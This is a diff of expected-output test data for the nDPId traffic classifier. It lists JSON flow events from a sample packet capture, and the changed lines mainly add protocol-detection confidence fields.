-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
